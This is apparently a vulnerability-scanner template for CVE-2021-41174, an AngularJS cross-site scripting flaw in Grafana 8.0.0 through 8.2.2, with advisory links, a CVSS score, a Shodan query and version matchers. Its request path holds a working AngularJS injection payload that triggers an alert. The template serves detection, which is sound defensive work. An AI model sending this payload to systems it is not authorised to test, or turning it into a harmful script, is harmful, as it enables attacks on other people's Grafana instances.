id: CVE-2021-41174 info: name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting author: pdteam severity: medium description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions. reference: - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8 - https://nvd.nist.gov/vuln/detail/CVE-2021-41174 - https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82 - https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912 remediation: Upgrade to 8.2.3 or higher. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2021-41174 cwe-id: CWE-79 metadata: shodan-query: title:"Grafana" tags: cve,cve2021,grafana,xss requests: - method: GET path: - "{{BaseURL}}/dashboard/snapshot/%7B%7Bconstructor.constructor(%27alert(document.domain)%27)()%7D%7D?orgId=1" skip-variables-check: true matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "Grafana" - "frontend_boot_js_done_time_seconds" condition: and - type: regex regex: - '"subTitle":"Grafana (v8\.(?:(?:1|0)\.[0-9]|2\.[0-2]))' extractors: - type: regex group: 1 regex: - '"subTitle":"Grafana ([a-z0-9.]+)' # Enhanced by mp on 2022/03/06